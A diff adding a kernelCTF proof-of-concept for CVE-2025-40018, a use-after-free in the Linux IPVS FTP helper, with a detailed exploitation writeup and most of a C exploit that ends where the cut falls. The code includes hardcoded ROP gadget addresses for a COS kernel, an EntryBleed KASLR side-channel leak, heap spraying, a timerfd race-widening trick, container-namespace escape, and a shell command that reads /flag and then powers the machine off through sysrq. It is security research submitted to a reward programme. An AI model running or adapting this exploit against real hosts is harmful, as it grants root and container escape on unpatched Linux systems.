diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md new file mode 100644 index 000000000..d8293e5bd --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md @@ -0,0 +1,274 @@ +## 1. Overview + +The vulnerability exists in the IP Virtual Server (IPVS) FTP helper module (`ip_vs_ftp`) and involves a Use-After-Free (UAF) in the module exit path. It occurs when the FTP application structure is freed during network namespace cleanup while still being referenced by active connections, leading to a UAF during connection flushing. + +## 2. Root Cause Analysis + +### 2.1. Module Exit and Application Free + +When a network namespace is destroyed, the kernel iterates through the exit handlers of all registered per-netns subsystems. The `ip_vs_ftp` module registers its exit handler, `__ip_vs_ftp_exit()`, which is executed before the core IPVS cleanup handler. + +In `__ip_vs_ftp_exit()`, the `unregister_ip_vs_app()` function is called to remove the FTP application. + +```c +static void __ip_vs_ftp_exit(struct net *net) +{ + struct netns_ipvs *ipvs = net_ipvs(net); + // [...] + unregister_ip_vs_app(ipvs, &ip_vs_ftp); +} +``` + +Inside `unregister_ip_vs_app()`, the `struct ip_vs_app` object representing the application template (variable `a`) is freed immediately using `kfree(a)` [1]. + +It is worth noting that the incarnations (`inc`) are also released via `ip_vs_app_inc_release()` [2], which uses `call_rcu`. Therefore, while `inc` remains memory-safe during the subsequent RCU-protected connection flush, it contains a pointer (`inc->app`) to the template `a` which has been freed immediately. This makes `inc->app` a dangling pointer, and `a` the victim object for exploitation. 
+ +```c +void unregister_ip_vs_app(struct netns_ipvs *ipvs, struct ip_vs_app *app) +{ + struct ip_vs_app *a, *anxt, *inc, *nxt; + mutex_lock(&__ip_vs_app_mutex); + + list_for_each_entry_safe(a, anxt, &ipvs->app_list, a_list) { + // [...] + list_for_each_entry_safe(inc, nxt, &a->incs_list, a_list) { + ip_vs_app_inc_release(ipvs, inc); // [2] + } + + list_del(&a->a_list); + kfree(a); // [1] The application template is freed immediately! + // [...] + } + mutex_unlock(&__ip_vs_app_mutex); +} +``` + +### 2.2. Connection Cleanup and UAF + +Following the execution of `__ip_vs_ftp_exit()`, the core IPVS cleanup handler `__ip_vs_cleanup_batch()` runs. This function flushes all remaining connections in the namespace. + +```c +static void __net_exit __ip_vs_cleanup_batch(struct list_head *net_list) +{ + // [...] + list_for_each_entry(net, net_list, exit_list) { + ipvs = net_ipvs(net); + ip_vs_conn_net_cleanup(ipvs); // [3] Flushes connections + // [...] + } +} +``` + +The connection flush path eventually reaches `ip_vs_unbind_app()`, which attempts to decrement the reference count of the application associated with the connection. + +```c +void ip_vs_unbind_app(struct ip_vs_conn *cp) +{ + struct ip_vs_app *inc = cp->app; + // [...] + ip_vs_app_inc_put(inc); // [4] + cp->app = NULL; +} +``` + +`ip_vs_app_inc_put()` decrements the incarnation's use count and then calls `ip_vs_app_put()` on the parent application. + +```c +void ip_vs_app_inc_put(struct ip_vs_app *inc) +{ + atomic_dec(&inc->usecnt); + ip_vs_app_put(inc->app); // [5] Accesses inc->app (which is 'a' from [1]) +} + +static inline void ip_vs_app_put(struct ip_vs_app *app) +{ + module_put(app->module); // [6] UAF: Dereferences app->module +} +``` + +The vulnerability manifests at [6]. The pointer `app` refers to the object `a` that was freed at [1]. Dereferencing `app->module` constitutes a Use-After-Free. + +### 2.3. 
The Race Window + +The vulnerability is a deterministic Use-After-Free where the object is freed and used in the same kernel thread. To exploit it, we must artificially create a race condition to reclaim the memory between these two events. + +#### Normal Execution + +In a normal scenario: + +``` +CPU 0 (netns cleanup kthread) +----------------------------- +__ip_vs_ftp_exit() + kfree(app) // [Free] + +__ip_vs_cleanup_batch() + ip_vs_conn_net_cleanup() + ip_vs_unbind_app() + ip_vs_app_put(app) + module_put(app->module) // [UAF] - Dereferencing freed memory +``` + +#### Exploitation (Winning the Race) + +The exploit uses a timer interrupt to stall CPU 0, allowing CPU 1 to reclaim the freed object: + +``` +CPU 0 (netns cleanup kthread) CPU 1 (Spray Thread) +----------------------------- -------------------- +__ip_vs_ftp_exit() + kfree(app) // [Free] + +< TimerFD Interrupt Fires > +< HardIRQ -> SoftIRQ > +< Stall: Churning huge waitqueue > + Spray user_key_payload + // [Reclaim] 'app' slot allocated + // Fake object written + +< Cleanup Resumes > +__ip_vs_cleanup_batch() + ip_vs_conn_net_cleanup() + ip_vs_unbind_app() + ip_vs_app_put(app) + module_put(app->module) // [UAF] - Dec(controlled addr) +``` + +## 3. Exploitation + +### 3.1. Primitive + +The UAF primitive allows us to perform an **Arbitrary Address Decrement**. +When `module_put(app->module)` is called on the reclaimed fake object: +1. We control `app->module`. Let's set it to `TARGET_ADDR - offsetof(struct module, refcnt)`. +2. `module_put` executes `atomic_dec(&module->refcnt)`. +3. This results in `atomic_dec(TARGET_ADDR)`. + +We use this primitive to corrupt the `next` pointer of a `msg_msg` object, creating overlapping chunks on the kernel heap. + +### 3.2. Triggering the Vulnerability + +The exploitation involves two main components: +1. **Cleaner Thread (CPU 0):** The kernel worker thread processing `cleanup_net`. This thread performs the Free and the Use. +2. 
**Sprayer Thread (CPU 1):** The attacker thread running on a separate CPU. This thread handles heap grooming and the reclamation spray. + +#### 3.2.1. Heap Grooming (CPU 1) + +We target the `kmalloc-256` cache where `struct ip_vs_app` resides. +1. **Spray `pg_vec`:** We spray `pg_vec` to fill slabs on CPU 1. +2. **Create Holes:** We close specific sockets to create free slots for the victim object. +3. **Allocate Victim:** We trigger `unshare(CLONE_NEWNET)` to allocate the `ip_vs_ftp` application into one of our prepared slots on CPU 1. +4. **Cross-CPU Slab Freeze:** We free an *additional* object in the victim's slab. This transitions the slab from "Full" to "Partial" on CPU 1. + +**Why Freeze?** When `kfree(app)` occurs on CPU 0, the object is returned to its owning slab. Since that slab sits on CPU 1's partial list, CPU 1 can immediately reallocate from it. Had we not done this before exiting the netns, the full-to-partial transition would instead happen on CPU 0 during `cleanup_net()`, placing the slab on CPU 0's partial list and making it impossible for CPU 1 to reclaim the object. + +```c +static void freeze_victim_slab() { + // Free one object per slab to transition FULL -> PARTIAL on CPU 1 + for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) { + close(packet_fds[i + SLOTS_PER_SLAB]); + packet_fds[i + SLOTS_PER_SLAB] = -1; + } +} +``` + +#### 3.2.2. Binding the Vulnerable Object + +To trigger the UAF, we must create a dependency between a persistent `ip_vs_conn` and the victim object (`ip_vs_app`). + +The exploit sets up an IPVS service on port 21 (FTP) and establishes a TCP connection to it. When the connection is created in `ip_vs_conn_new()`, the kernel checks whether the protocol has any registered applications. Since `ip_vs_ftp` is registered for port 21, the connection is automatically bound to the FTP application incarnation. + +```c +// net/netfilter/ipvs/ip_vs_conn.c +struct ip_vs_conn * +ip_vs_conn_new(...) +{ + // ... 
+ if (unlikely(pd && atomic_read(&pd->appcnt))) + ip_vs_bind_app(cp, pd->pp); + // ... +} + +// net/netfilter/ipvs/ip_vs_proto_tcp.c +static int +tcp_app_conn_bind(struct ip_vs_conn *cp) +{ + // ... + list_for_each_entry_rcu(inc, &ipvs->tcp_apps[hash], p_list) { + if (inc->port == cp->vport) { + // ... + cp->app = inc; // [1] Connection bound to FTP incarnation + // ... + } + } + return result; +} +``` + +This binding (`cp->app`) is critical. When the namespace is destroyed, `ip_vs_conn_flush()` cleans up this connection, accessing `cp->app->app`—the object that has just been freed by `ip_vs_ftp_exit`. + +#### 3.2.3. Extending the Race Window (Timerfd Storm) + +To reclaim the object between the Free and the Use on CPU 0, we employ a technique that transforms a tiny kernel race window into a large, hit-able target by racing against a hardware timer. + +1. **Timerfd:** We create a `timerfd` and arm it to fire *exactly* when the cleanup thread is executing the critical section on CPU 0. +2. **Waitqueue Churn:** We attach thousands of `epoll` instances to this `timerfd`. When the timer expires, the hardware raises an interrupt on CPU 0. The interrupt handler wakes up all waiters on the `timerfd`. Because we have attached a massive number of `epoll` entries, the kernel is forced to churn through this list. +3. **The Stall:** This massive "thundering herd" effectively stalls the execution of the cleanup thread on CPU 0 for milliseconds, turning a microsecond-scale race into a stable, millisecond-scale window. + +```c + tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0)); + do_epoll_enqueue(tfd, 17); // Enqueue thousands of epoll items + + // ... inside the race loop ... + // Arm timer to fire just as cleanup_net starts + timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL); +``` + +#### 3.2.4. Reclaiming with `user_key_payload` + +While CPU 0 is stalled, CPU 1 continuously sprays `user_key_payload` objects using `add_key()`. 
These objects fit in `kmalloc-256` and allow us to write fully controlled data into the freed slot. + +```c +void *spray_job(void *arg) { + bind_to_cpu(1); + while (1) { + // ... synchronization ... + spray_userkey(); // Reclaim the freed slot + // ... synchronization ... + cleanup_userkey(); + } +} +``` + +We craft the key payload as a fake `struct ip_vs_app`, setting its `module` pointer so that the decrement lands on our `msg_msg` object. + +```c +static inline void set_dec_addr(uint64_t target) { + char *fake_ip_vs_app = user_key_payload; + // Point app->module to (Target Address - refcnt_offset) + *(uint64_t *)&fake_ip_vs_app[IP_VS_APP_OFFSETS_MODULE] = target - MODULE_OFFSETS_REFCNT; +} +``` + +### 3.3. Bypass KASLR + +The UAF primitive does not provide a kernel-address leak, yet it is only usable once a valid kernel text address is known, since forging the `module` pointer requires one. + +To address this, we use EntryBleed, a prefetch-based timing side channel, to leak the kernel base and the physmap (direct-mapping) base. More details can be found at https://www.willsroot.io/2022/12/entrybleed.html or in other kernelCTF submissions. + +### 3.4. Privilege Escalation (Msg_msg Overlap) + +1. **Heap Spray:** We spray ~1.37 GB of `msg_msg` objects so that one lands at a predictable direct-map address (`GUESSED_MSG_ADDR`). +2. **Corrupt `next`:** The UAF primitive decrements the `next` pointer of a message header. This causes it to point into a previous message's segment, creating two overlapping `msg_msgseg` objects. +3. **UAF on `pipe_buffer`:** + * We free the *first* overlapping segment (victim). + * We spray `pipe_buffer` objects, which are allocated into the now-freed slot. + * We free the *second* overlapping segment (target). Since the two overlap, this frees the memory now occupied by the `pipe_buffer`, creating a Use-After-Free condition on the `pipe_buffer` object. +4. **ROP Chain:** + * We spray `msg_msgseg` objects again to reclaim the freed `pipe_buffer` slot with controlled data. 
+ * We overwrite the `pipe_buffer->ops` pointer with a fake vtable pointing to our gadgets. + * Triggering `pipe_release()` (by closing the pipe) invokes the fake release function, pivoting the stack to execute the ROP chain. + +### 3.5. Container Escape + +The exploit runs inside a container. The ROP chain includes a call to `switch_task_namespaces(init_nsproxy)` to switch the process back to the host's initial namespace, effectively breaking out of the container before spawning a root shell. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md new file mode 100644 index 000000000..de53a62cb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md @@ -0,0 +1,36 @@ +# Vulnerability +The vulnerability is a Use-After-Free (UAF) issue in the IPVS subsystem caused by incorrect cleanup ordering during network namespace destruction. The FTP application helper (`ip_vs_ftp`) frees its application structure (`struct ip_vs_app`) in its exit handler `__ip_vs_ftp_exit`, which runs before the core IPVS cleanup handler `__ip_vs_cleanup_batch`. When `__ip_vs_cleanup_batch` subsequently flushes active connections, it dereferences the now-freed application structure via `cp->app->app`, leading to a UAF. 
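The free/use ordering described above can be modeled in a few lines of userspace C. This is a simplified sketch, not kernel code: the structures are reduced to the fields the bug needs, a `freed` flag stands in for the real `kfree()`, and `cleanup_order_is_buggy()` is a name invented here for illustration.

```c
/* Simplified stand-ins for the kernel structures involved. */
struct ip_vs_app  { int freed; };               /* the FTP app template */
struct ip_vs_conn { struct ip_vs_app *app; };   /* a tracked connection */

/* Returns 1 if the connection flush would touch freed memory. */
static int cleanup_order_is_buggy(void)
{
    struct ip_vs_app app = { .freed = 0 };
    struct ip_vs_conn conn = { .app = &app };   /* binding created on port 21 */

    /* Step 1: __ip_vs_ftp_exit() -> unregister_ip_vs_app() -> kfree(a) */
    app.freed = 1;

    /* Step 2: __ip_vs_cleanup_batch() -> ip_vs_conn_net_cleanup() flushes
     * the connection and follows cp->app into the already-freed template. */
    return conn.app->freed;
}
```

Because the ftp helper's pernet exit handler runs before the core IPVS one, the "use" in step 2 always happens after the "free" in step 1.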
+ +## Requirements to trigger the vulnerability +- Capabilities: CAP_NET_ADMIN +- Kernel configuration: CONFIG_NETFILTER, CONFIG_IP_VS, CONFIG_IP_VS_FTP +- User namespaces needed: Yes + +## Commit which introduced the vulnerability +- [61b1ab4583e275af216c8454b9256de680499b19](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=61b1ab4583e275af216c8454b9256de680499b19) + +## Commit which fixed the vulnerability +- Fixed in 5.4.301 with commit [8a6ecab3847c213ce2855b0378e63ce839085de3](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=8a6ecab3847c213ce2855b0378e63ce839085de3) +- Fixed in 5.10.246 with commit [421b1ae1574dfdda68b835c15ac4921ec0030182](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=421b1ae1574dfdda68b835c15ac4921ec0030182) +- Fixed in 5.15.195 with commit [1d79471414d7b9424d699afff2aa79fff322f52d](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=1d79471414d7b9424d699afff2aa79fff322f52d) +- Fixed in 6.1.156 with commit [53717f8a4347b78eac6488072ad8e5adbaff38d9](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=53717f8a4347b78eac6488072ad8e5adbaff38d9) +- Fixed in 6.6.112 with commit [8cbe2a21d85727b66d7c591fd5d83df0d8c4f757](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=8cbe2a21d85727b66d7c591fd5d83df0d8c4f757) +- Fixed in 6.12.53 with commit [dc1a481359a72ee7e548f1f5da671282a7c13b8f](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=dc1a481359a72ee7e548f1f5da671282a7c13b8f) +- Fixed in 6.17.3 with commit [a343811ef138a265407167294275201621e9ebb2](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=a343811ef138a265407167294275201621e9ebb2) +- Fixed in 6.18-rc1 with commit 
[134121bfd99a06d44ef5ba15a9beb075297c0821](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=134121bfd99a06d44ef5ba15a9beb075297c0821) + +## Affected kernel versions +- 5.4.0 - 5.4.300 +- 5.10.0 - 5.10.245 +- 5.15.0 - 5.15.194 +- 6.1.0 - 6.1.155 +- 6.6.0 - 6.6.111 +- 6.12.0 - 6.12.52 +- 6.17.0 - 6.17.2 + +## Affected component, subsystem +- Netfilter +- IPVS + +## Cause +- Use-After-Free \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/Makefile b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/Makefile new file mode 100644 index 000000000..7cb8a8850 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/Makefile @@ -0,0 +1,2 @@ +exploit: exploit.c + gcc $^ -pthread -static -o $@ \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit new file mode 100755 index 000000000..dcbf4b625 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit.c b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit.c new file mode 100644 index 000000000..f3f61b356 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit.c @@ -0,0 +1,913 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#include +#include +#include +#include + +#define PAGE_SIZE 0x1000 + +// =-=-=-=-=-=-=-= LOG HELPERS =-=-=-=-=-=-=-= +#define COLOR_GREEN "\033[32m" +#define COLOR_RED "\033[31m" +#define COLOR_BLUE "\033[34m" +#define COLOR_DEFAULT "\033[0m" 
+#define COLOR_BOLD "\033[1m" +#define COLOR_BRIGHT_BLUE "\033[94m" + +#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__) +#define logi(fmt, ...) dprintf(2, COLOR_BLUE COLOR_BOLD"[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__) +#define logs(fmt, ...) dprintf(2, COLOR_GREEN COLOR_BOLD"[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__) +#define loge(fmt, ...) dprintf(2, COLOR_RED COLOR_BOLD"[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__) +#define die(fmt, ...) \ + do { \ + loge(fmt ": %m", ##__VA_ARGS__); \ + loge("Exit at line %d", __LINE__); \ + exit(1); \ + } while (0) +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) { \ + die("SYSCHK(" #x ")"); \ + } \ + __res; \ + }) + +// =-=-=-=-=-=-=-= ROP HELPERS =-=-=-=-=-=-=-= +// 0xffffffff8114067e : pop rsp ; pop r15 ; ret +#define POP_RSP_POP_R15_RET 0xffffffff8114067e +// 0xffffffff81a0f50b : push rsi ; jmp qword ptr [rsi + 0x39] +#define PUSH_RSI_JMP_QWORD_PTR_RSI_0X39 0xffffffff81a0f50b +// 0xffffffff8138288b : pop rdi ; or dh, dh ; ret +#define POP_RDI_RET 0xffffffff8138288b +// 0xffffffff81126164 : pop r12 ; pop rbp ; pop rbx ; ret +#define POP_R12_POP_RBP_POP_RBX_RET 0xffffffff81126164 +// 0xffffffff81f1beb1 : pop rsi ; or dh, dh ; ret +#define POP_RSI_RET 0xffffffff81f1beb1 +// 0xffffffff819ecfd2 : push rax ; jmp qword ptr [rsi - 0x7f] +#define PUSH_RAX_JMP_QWORD_PTR_RSI_MINUS_0x7f 0xffffffff819ecfd2 + +#define INIT_CRED 0xffffffff83a75f00 +#define INIT_NSPROXY 0xffffffff83a75cc0 +#define COMMIT_CREDS 0xffffffff811d55b0 +#define SWITCH_TASK_NAMESPACES 0xffffffff811d3a30 +#define FIND_TASK_BY_VPID 0xffffffff811cbf20 +#define INIT_TASK 0xffffffff83a15a40 +#define PREPARE_KERNEL_CRED 0xffffffff811d5850 +#define RET2USERMODE 0xffffffff824011c6 + +uint64_t cs, rsp, ss, rflags; + +static void save_status() { + asm( + "movq %%cs, %0\n" + "movq %%ss, %1\n" + "pushfq\n" + "popq 
%2\n" + "movq %%rsp, %3\n" + : "=r" (cs), "=r" (ss), "=r" (rflags), "=r" (rsp) : : "memory" ); +} + +void win(void){ + logs("exploit success!!"); + // escape pid/mount/network/ipc namespace + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + char* shell[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && echo ; echo o>/proc/sysrq-trigger", + NULL, + }; + execve(shell[0], shell, NULL); + exit(0); +} + +// =-=-=-=-=-=-=-= UTILS =-=-=-=-=-=-=-= +void write_file(const char * filename, const char * buf) { + int fd = open(filename, O_WRONLY | O_CLOEXEC); + if (fd < 0) die("open"); + if (write(fd, buf, strlen(buf)) != strlen(buf)) die("write"); + close(fd); +} + +static void setup_namespace(void) { + char uid_map[128]; + char gid_map[128]; + uid_t uid = getuid(); + gid_t gid = getgid(); + if (unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET | CLONE_NEWIPC)) + die("unshare"); + sprintf(uid_map, "0 %d 1\n", uid); + sprintf(gid_map, "0 %d 1\n", gid); + write_file("/proc/self/uid_map", uid_map); + write_file("/proc/self/setgroups", "deny"); + write_file("/proc/self/gid_map", gid_map); +} + +static void bring_interface_up(const char *ifname) +{ + int sockfd; + struct ifreq ifr; + sockfd = socket(AF_INET, SOCK_DGRAM, 0); + if (sockfd < 0) + die("socket"); + memset(&ifr, 0, sizeof ifr); + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + ifr.ifr_flags |= IFF_UP; + ioctl(sockfd, SIOCSIFFLAGS, &ifr); + close(sockfd); +} + +static void bind_to_cpu(int core){ + cpu_set_t cpu_set; + CPU_ZERO(&cpu_set); + CPU_SET(core, &cpu_set); + if (sched_setaffinity(0, sizeof(cpu_set_t), &cpu_set) == -1) + die("sched_setaffinity"); +} + +// ========-=-=-=-=-= TIMERFD RACE HELPERS =-=-=-=-=-=-=-= +int count; +char buf[0x1000]; +int timefds[0x1000]; +int epfds[0x1000]; +int tfd; +pid_t childs[0x10]; +pthread_barrier_t barr; +int ncpus; + +static void barrier(pthread_barrier_t *barr) +{ + int ret = 
pthread_barrier_wait(barr); + assert(!ret || ret == PTHREAD_BARRIER_SERIAL_THREAD); +} + +static void epoll_ctl_add(int epfd, int fd, uint32_t events) +{ + struct epoll_event ev; + ev.events = events; + ev.data.fd = fd; + SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev)); +} + +static void do_epoll_enqueue(int fd, int f) +{ + int cfd[2]; + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); + for (int k = 0; k < f; k++) + { + childs[k] = fork(); + if (childs[k] == 0) + { + for (int i = 0; i < 0xd0; i++) + { + timefds[i] = SYSCHK(dup(fd)); + } + for (int i = 0; i < 0xd0; i++) + { + epfds[i] = SYSCHK(epoll_create(0x1)); + } + for (int i = 0; i < 0xd0; i++) + { + for (int j = 0; j < 0xd0; j++) + { + epoll_ctl_add(epfds[i], timefds[j], 0); + } + } + write(cfd[1], buf, 1); + raise(SIGSTOP); + } + read(cfd[0], buf, 1); + } +} + +// =-=-=-=-=-=-=-= ENTRYBLEED HELPERS =-=-=-=-=-=-=-= +// https://www.willsroot.io/2022/12/entrybleed.html +#define KERNEL_BASE 0xffffffff81000000 +#define KERNEL_LOWER_BOUND 0xffffffff80000000ull +#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull + +#define STEP_KERNEL 0x100000ull +#define SCAN_START_KERNEL KERNEL_LOWER_BOUND +#define SCAN_END_KERNEL KERNEL_UPPER_BOUND +#define ARR_SIZE_KERNEL (SCAN_END_KERNEL - SCAN_START_KERNEL) / STEP_KERNEL + +#define PHYS_LOWER_BOUND 0xffff888000000000ull +#define PHYS_UPPER_BOUND 0xfffffe0000000000ull + +#define STEP_PHYS 0x40000000ull +#define SCAN_START_PHYS PHYS_LOWER_BOUND +#define SCAN_END_PHYS PHYS_UPPER_BOUND +#define ARR_SIZE_PHYS (SCAN_END_PHYS - SCAN_START_PHYS) / STEP_PHYS + +#define DUMMY_ITERATIONS 5 +#define ITERATIONS 100 +#define LEAK_TIMES 5 + +// Based on experiment, the kernel heap address leaked from sidechannel is KERNEL_PHYS_MAP + LEAKED_OFFSET +#define LEAKED_OFFSET 0x100000000 + +uint64_t leak_kernel_base, leak_kheap_base, kernel_offset = 0; + +uint64_t sidechannel(uint64_t addr) { + uint64_t a, b, c, d; + asm volatile ( + ".intel_syntax noprefix;" + "mfence;" + "rdtscp;" + "mov %0, rax;" + "mov 
%1, rdx;" + "xor rax, rax;" + "lfence;" + "prefetchnta qword ptr [%4];" + "prefetcht2 qword ptr [%4];" + "xor rax, rax;" + "lfence;" + "rdtscp;" + "mov %2, rax;" + "mov %3, rdx;" + "mfence;" + ".att_syntax;" + : "=r" (a), "=r" (b), "=r" (c), "=r" (d) + : "r" (addr) + : "rax", "rbx", "rcx", "rdx" + ); + a = (b << 32) | a; + c = (d << 32) | c; + return c - a; +} + +uint64_t prefetch(int phys) { + uint64_t arr_size = ARR_SIZE_KERNEL; + uint64_t scan_start = SCAN_START_KERNEL; + uint64_t step_size = STEP_KERNEL; + if (phys) + { + arr_size = ARR_SIZE_PHYS; + scan_start = SCAN_START_PHYS; + step_size = STEP_PHYS; + } + + uint64_t *data = malloc(arr_size * sizeof(uint64_t)); + memset(data, 0, arr_size * sizeof(uint64_t)); + uint64_t addr = ~0; + + for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) { + for (uint64_t idx = 0; idx < arr_size; idx++) { + uint64_t test = scan_start + idx * step_size; + syscall(104); + uint64_t time = sidechannel(test); + if (i >= DUMMY_ITERATIONS) { + data[idx] += time; + } + } + } + for (int i = 0; i < arr_size; i++) { + data[i] /= ITERATIONS; + } + double initial_avg = 0.0; + for (int i = 0; i < arr_size; i++) { + initial_avg += data[i]; + } + initial_avg /= arr_size; + double background_avg = 0.0; + int count = 0; + for (int i = 0; i < arr_size; i++) { + if (data[i] <= initial_avg * 1.1) { + background_avg += data[i]; + count++; + } + } + if (count > 0) { + background_avg /= count; + } else { + background_avg = initial_avg; + } + // Select the first address whose time is lower than threshold as target address + // threshold = 0.9 * average_time + double threshold = background_avg * 0.9; + for (int i = 0; i < arr_size; i++) { + if (data[i] < threshold) { + addr = scan_start + i * step_size; + break; + } + } + return addr; +} + +size_t mostFrequent(size_t *arr, size_t n) +{ + size_t maxcount = 0; + size_t element_having_max_freq; + for (int i = 0; i < n; i++) + { + size_t Count = 0; + for (int j = 0; j < n; j++) + { + if (arr[i] == 
arr[j]) + Count++; + } + if (Count > maxcount) + { + maxcount = Count; + element_having_max_freq = arr[i]; + } + } + return element_having_max_freq; +} + +void leak() { + size_t kbase[LEAK_TIMES] = {0}; + size_t kheap_base[LEAK_TIMES] = {0}; + for (int i = 0; i < LEAK_TIMES; i++) + { + kbase[i] = prefetch(0); + logd("%dth iteration leak: 0x%lx", i, kbase[i]); + } + for (int i = 0; i < LEAK_TIMES; i++) + { + kheap_base[i] = prefetch(1) - LEAKED_OFFSET; + logd("%dth iteration leak: 0x%lx", i, kheap_base[i]); + } + + leak_kernel_base = mostFrequent(kbase, LEAK_TIMES); + kernel_offset = leak_kernel_base - KERNEL_BASE; + leak_kheap_base = mostFrequent(kheap_base, LEAK_TIMES); + + logs("Chosen KASLR base: %lx", leak_kernel_base); + logs("Chosen KHEAP base: %lx", leak_kheap_base); + logs("kernel offset: %lx", kernel_offset); +} + +// =-=-=-=-=-=-=-= PG_VEC HELPERS =-=-=-=-=-=-=-= +static void packet_socket_rx_ring_init(int s, unsigned int block_size, + unsigned int frame_size, unsigned int block_nr, + unsigned int sizeof_priv, unsigned int timeout) { + int v = TPACKET_V3; + if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)) < 0) + die("setsockopt(PACKET_VERSION)"); + + struct tpacket_req3 req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_frame_size = frame_size; + req.tp_block_nr = block_nr; + req.tp_frame_nr = (block_size * block_nr) / frame_size; + req.tp_retire_blk_tov = timeout; + req.tp_sizeof_priv = sizeof_priv; + + if (setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)) < 0) + die("setsockopt(PACKET_RX_RING)"); +} + +static int packet_socket_setup(unsigned int block_size, unsigned int frame_size, + unsigned int block_nr, unsigned int sizeof_priv, int timeout) { + int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) die("socket(AF_PACKET)"); + + packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, + sizeof_priv, timeout); + + struct sockaddr_ll sa; + memset(&sa, 0, sizeof(sa)); + 
sa.sll_family = PF_PACKET; + sa.sll_protocol = htons(ETH_P_ALL); + sa.sll_ifindex = if_nametoindex("lo"); + + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) + die("bind(AF_PACKET)"); + + return s; +} + +// We use kmalloc-256 pg_vec as spray object +#define KMALLOC256_SIZE 256 +#define KMALLOC256_PAGE_CNT ((KMALLOC256_SIZE) / sizeof(void *)) +static int alloc_kmalloc_256_pg_vec() { + return packet_socket_setup(PAGE_SIZE, 2048, KMALLOC256_PAGE_CNT, 0, 100); +} +/* + * Victim object: ip_vs_app (kmalloc-256), allocated by unshare(CLONE_NEWNET) + * But unshare(CLONE_NEWNET) allocates many kmalloc-256 objects in a row: + * (20 objs) (victim obj) (40+ objs), so the victim obj is the 21st + */ +#define VICTIM_ALLOC_POSITION 21 +#define KMALLOC_256_OBJS_PER_SLAB 16 +// We choose SLOTS_PER_SLAB=8 based on experiment +#define SLOTS_PER_SLAB 8 +#define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d)) +#define SPRAY_SLABS (DIV_ROUND_UP(VICTIM_ALLOC_POSITION, SLOTS_PER_SLAB)) +#define PACKET_SPRAY_CNT (KMALLOC_256_OBJS_PER_SLAB * SPRAY_SLABS) + +int packet_fds[PACKET_SPRAY_CNT]; +// After spraying kmalloc-256 pg_vec and freeing some of them to create slots, +// the victim obj allocated later has a high chance to land in one of the slots. +static void spray_pg_vec_and_create_slots() { + memset(packet_fds, 0, sizeof(packet_fds)); + for (int i = 0; i < PACKET_SPRAY_CNT; i++) { + packet_fds[i] = alloc_kmalloc_256_pg_vec(); + if (packet_fds[i] < 0) die("alloc_kmalloc_256_pg_vec"); + } + for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) { + for (int j = 0; j < SLOTS_PER_SLAB; j++) { + 